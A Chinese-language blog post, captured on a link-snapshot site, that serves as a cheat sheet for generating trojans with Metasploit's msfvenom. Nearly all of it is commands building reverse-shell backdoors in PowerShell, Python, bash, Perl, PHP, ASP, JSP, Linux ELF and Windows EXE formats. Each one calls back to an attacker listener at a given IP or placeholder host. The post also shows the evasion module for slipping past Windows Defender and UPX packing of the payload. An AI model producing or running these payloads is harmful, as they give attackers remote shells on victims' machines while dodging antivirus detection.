添加链接 注册    登录
link管理
链接快照平台
  • 输入网页链接,自动生成快照
  • 标签化管理网页链接
相关文章推荐
不拘小节的仙人掌  ·  【云原生渗透】- docker ...·  1 周前    · 
慷慨大方的番茄  ·  二次渲染绕过 · GitBook·  2 周前    · 
跑龙套的橡皮擦  ·  Jira未授权服务端模板注入漏洞(CVE-2 ...·  2 周前    · 
朝气蓬勃的足球  ·  20240620_camera·  3 周前    · 
酷酷的羊肉串  ·  DDCTF 2019 WP·  3 周前    · 
失恋的煎鸡蛋  ·  专家详解软件缩水原理 ...·  3 周前    · 
眼睛小的酸菜鱼  ·  Execution returns ...·  1 月前    · 
温柔的玉米  ·  Green Lion Smart ...·  2 月前    · 
博学的乌冬面  ·  EGFR exon 20 - Drugs, ...·  6 月前    · 
暗恋学妹的柳树  ·  T-SQL行合并成列与列拆分成行 - ...·  6 月前    · 
link管理  ›  metasploit生成木马 | Zain
msfvenom metasploit shell payload
https://byzain.github.io/metasploit%E7%94%9F%E6%88%90%E6%9C%A8%E9%A9%AC/
乖乖的牛肉面
2 月前

生成跨平台脚本木马

我们知道了可以使用msfvenom生成木马,针对脚本语言比如python、ruby、php甚至powershell,需要选择对应的 payload 后使用 -f raw 指定使用源码生成,如下所示:

生成powershell后门,meterpreter上线 

1
 
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.131 LPORT=12345 --arch x64 --platform windows -f psh-reflection -o test.ps1

powershll上线后ctrl+z隐藏后台,和bg一个意思

替换exp中payload

生成自定义的payload替换掉exp中的内容(使用-v参数指定变量名,还有-b避免出现什么字符) 

1
 
msfvenom -p windows/x64/meterpreter/reverse_tcp -f python -v USER_PAYLOAD -b "\x00\xff" lhost=193.122.122.123 lport=12345

免杀模块

evasion是msf的免杀模块,本质上其实就是混淆

命令示例: 

1
2
3
4
5
 
use evasion/windows/windows_defender_exe 
set payload windows/meterpreter/reverse_tcp
set lhost 193.122.122.123
set lport 12345
run

其他

生成Linux木马 

1
 
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

生成bash木马 

1
 
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

生成Python木马 

1
 
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

生成PHP木马 

1
2
 
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

生成ASP木马 

1
 
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

生成JSP木马 

1
 
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

生成Perl木马 

1
 
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

生成exe马 

1
 
msfvenom -p windows/x86/meterpreter/reverse_http --format exe lhost=192.168.1.131 lport=12345 > msf_12345_http_reverse.exe

对木马进行UPX加壳 

1
 
upx shell.exe
 
推荐文章
不拘小节的仙人掌  ·  【云原生渗透】- docker runc容器逃逸漏洞(CVE-2019-5736) - 火线 Zone-安全攻防社区
1 周前
慷慨大方的番茄  ·  二次渲染绕过 · GitBook
2 周前
跑龙套的橡皮擦  ·  Jira未授权服务端模板注入漏洞(CVE-2019-11581) - caiqiqi
2 周前
朝气蓬勃的足球  ·  20240620_camera
3 周前
酷酷的羊肉串  ·  DDCTF 2019 WP
3 周前
失恋的煎鸡蛋  ·  专家详解软件缩水原理 绝妙方法克服旋转矩阵不足_彩票_NIKE新浪竞技风暴_新浪网
3 周前
眼睛小的酸菜鱼  ·  Execution returns <pexpect.popen_spawn.PopenSpawn object at 0x029678F0> · Issue #329 · pexpect/pexpe
1 月前
温柔的玉米  ·  Green Lion Smart Combo: Sunglass and Adventure Watch
2 月前
博学的乌冬面  ·  EGFR exon 20 - Drugs, Indications, Patents - Synapse
6 月前
暗恋学妹的柳树  ·  T-SQL行合并成列与列拆分成行 - MSSQL123 - 博客园
6 月前
Link管理   ·   51好读   ·   Sov5搜索   ·   小百科
link管理 - 链接快照平台